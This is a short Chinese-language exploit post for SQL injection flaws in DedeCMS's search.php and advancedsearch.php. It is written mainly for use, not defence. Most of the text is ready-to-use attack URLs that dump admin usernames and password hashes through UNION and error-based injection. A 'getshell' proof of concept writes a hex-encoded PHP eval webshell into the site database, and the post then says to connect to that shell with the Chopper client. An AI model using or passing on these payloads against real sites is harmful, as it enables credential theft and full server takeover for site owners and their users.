dedecms的最近出的一高危漏洞，search.php注入漏洞;估计现在很多黑阔都非常爱dedecms,因为经常有各种漏洞爆出.很多利用起来也都很简单.

下面是漏洞的详细利用细节：

0x1:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为：Safe Alert: Request Error step 2 !

则利用以下exp:http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\’`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\’`+]=a

0x2:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为：Safe Alert: Request Error step 1 !

则利用以下exp:http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a

-----------------------------------------------------------------------------

条件利用：

1.漏洞代码在/plus/advancedsearch.php 文件中
2.php.ini要开启session.auto_start = 1
3.必须知道一个存在的mid，需要后台有添加自定义搜索模型

爆账号密码poc：

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123

getshell poc:

http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123

然后菜刀链接http://localhost/dedecms/plus/mytag_js.php?aid=1 密码:c